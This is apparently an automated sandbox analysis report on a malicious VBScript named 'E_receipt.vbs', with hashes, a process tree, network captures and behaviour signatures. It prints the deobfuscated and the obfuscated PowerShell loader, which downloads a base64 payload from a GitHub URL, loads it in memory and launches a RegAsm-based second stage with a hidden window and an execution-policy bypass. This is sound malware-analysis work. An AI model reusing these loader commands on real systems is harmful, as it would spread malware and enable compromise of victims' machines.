Analysis

  • max time kernel
    16s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    09/10/2024, 18:04 UTC

General

  • Target

    E_receipt.vbs

  • Size

    3KB

  • MD5

    1f7229b717e61580e9baf2830ee7afd0

  • SHA1

    98ade23ab27475f6d62f97a45b76b247075ff421

  • SHA256

    fa4cc3e867b36269dab9161f078565ff9048ac55ea6dccb8a39b5e156009eabf

  • SHA512

    ed233c408b5e7f6948756ff6a7585733055de3ccb3b0408aed31b543a5da722f5e0de949cce3fef1dc22be07aa481205efd5aa2c99959195b3c6ed758e7715f3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
# powershell snippet 0
"$url = 'https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt'; $base64Content = (New-Object System.Net.WebClient).DownloadString($url); $binaryContent = [System.Convert]::FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); [dnlib.IO.Home]::VAI(\"txt.3rx/moc.yapesmetsys//:sptth\", \"1\", \"C:\\ProgramData\\\", \"vagem\", \"RegAsm\", \"\",\"\")"|invoke-expression

# powershell snippet 1
$url = "https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt"
$base64content = (new-object system.net.webclient).downloadstring("https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt")
$binarycontent = [system.convert]::frombase64string($base64content)
$assembly = [reflection.assembly]::load($binarycontent)
[dnlib.io.home]::vai("txt.3rx/moc.yapesmetsys//:sptth", "1", "C:\\ProgramData\\", "vagem", "RegAsm", "", "")

URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\E_receipt.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:612
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bcfurl'+' = O3hhtt'+'ps:/'+'/raw.gi'+'th'+'ubuserc'+'ontent'+'.'+'com/No'+'Detec'+'tOn/NoDetectOn/r'+'efs/he'+'ad'+'s/main/'+'De'+'tahNoth'+'-V.txtO3h'+'; '+'bcfbase64Cont'+'en'+'t ='+' (Ne'+'w'+'-Object '+'System.Net.We'+'b'+'Client)'+'.Do'+'wnlo'+'adS'+'trin'+'g(bcf'+'url); '+'b'+'c'+'fbinaryCont'+'ent'+' = '+'['+'System.'+'C'+'onv'+'ert'+']::FromBase64Stri'+'ng(bcfbase6'+'4'+'Content);'+' b'+'cfas'+'sem'+'bly '+'= [Reflectio'+'n'+'.Assem'+'bly]::Load(b'+'cf'+'bi'+'nary'+'Co'+'ntent);'+' [dnli'+'b'+'.I'+'O.Home]'+'::V'+'AI('+'ltRtxt.3r'+'x/moc.ya'+'pes'+'metsy'+'s//:sptthl'+'tR'+', '+'ltR1ltR'+','+' l'+'tRC:4VPP'+'rogramD'+'ata4VPltR, '+'lt'+'Rv'+'ag'+'emltR,'+' l'+'tRReg'+'Asml'+'t'+'R, lt'+'R'+'ltR,ltRl'+'t'+'R)') -REPlAcE([cHAr]79+[cHAr]51+[cHAr]104),[cHAr]39 -REPlAcE 'ltR',[cHAr]34 -REPlAcE ([cHAr]52+[cHAr]86+[cHAr]80),[cHAr]92 -REPlAcE 'bcf',[cHAr]36) |.( $shElLId[1]+$ShELLID[13]+'x')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2936

Network

  • flag-us
    DNS
    paste.ee
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    paste.ee
    IN A
    Response
    paste.ee
    IN A
    172.67.187.200
    paste.ee
    IN A
    104.21.84.67
  • flag-us
    GET
    http://paste.ee/d/VO2TX
    WScript.exe
    Remote address:
    172.67.187.200:80
    Request
    GET /d/VO2TX HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 09 Oct 2024 18:04:26 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Location: https://paste.ee/d/VO2TX
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6%2FSDBW2kXV1RAChWVKeMPUaJMLRHdzPMxeVsBFNrxWqXVbg3GlYO32VzaW2khf9A2%2Fq1bLU4MBD1FJ%2BuwGoMErwXwa%2BGADpSwgUeaWFiwuXV5v4i8Jxkb%2FihQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Speculation-Rules: "/cdn-cgi/speculation"
    Server: cloudflare
    CF-RAY: 8d004b0a2a9abebe-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    GET
    https://paste.ee/d/VO2TX
    WScript.exe
    Remote address:
    172.67.187.200:443
    Request
    GET /d/VO2TX HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
    Response
    HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 18:04:27 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=2592000
    strict-transport-security: max-age=63072000
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xgXXsHHfWMrU%2FOGOIlJdCA0M1DL6VOBnxahY5iJ0RLVxa9nkVyKRk5RpMM2kXFWQpNxcr%2BZ0Q1OwOgkrsGSZqxybAIz%2F8BeBZEPt2pHgx5FoMXSXT5fUnW%2F3CA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d004b0ccce39541-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    raw.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
    raw.githubusercontent.com
    IN A
    185.199.110.133
  • 172.67.187.200:80
    http://paste.ee/d/VO2TX
    http
    WScript.exe
    403 B
    1.0kB
    5
    4

    HTTP Request

    GET http://paste.ee/d/VO2TX

    HTTP Response

    301
  • 172.67.187.200:443
    https://paste.ee/d/VO2TX
    tls, http
    WScript.exe
    5.6kB
    265.2kB
    112
    217

    HTTP Request

    GET https://paste.ee/d/VO2TX

    HTTP Response

    200
  • 185.199.109.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
    219 B
    5
    5
  • 185.199.109.133:443
    raw.githubusercontent.com
    tls
    powershell.exe
    359 B
    219 B
    5
    5
  • 8.8.8.8:53
    paste.ee
    dns
    WScript.exe
    54 B
    86 B
    1
    1

    DNS Request

    paste.ee

    DNS Response

    172.67.187.200
    104.21.84.67

  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    powershell.exe
    71 B
    135 B
    1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.109.133
    185.199.111.133
    185.199.108.133
    185.199.110.133

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    115de104d2e417f732ad8ac27d2f835a

    SHA1

    dd210f9df79ee904e27b513249ba3a2a59ea20ff

    SHA256

    2119799f6fb5608553ad91f0ce7f16a1254233b52b55e2197df8cccbb77b9bda

    SHA512

    adb071e49f5c2410c8bc27382ee85602420aa49e1e4828788dde65bd8eee99171fa7365c81d1ee6056d99802483a7d9c5dce47f22313e3c4f765471e388f636d

  • memory/612-4-0x000007FEF50CE000-0x000007FEF50CF000-memory.dmp

    Filesize

    4KB

  • memory/612-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

    Filesize

    2.9MB

  • memory/612-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

    Filesize

    32KB

  • memory/612-12-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

    Filesize

    9.6MB

  • memory/612-13-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

    Filesize

    9.6MB

  • memory/612-14-0x000007FEF4E10000-0x000007FEF57AD000-memory.dmp

    Filesize

    9.6MB
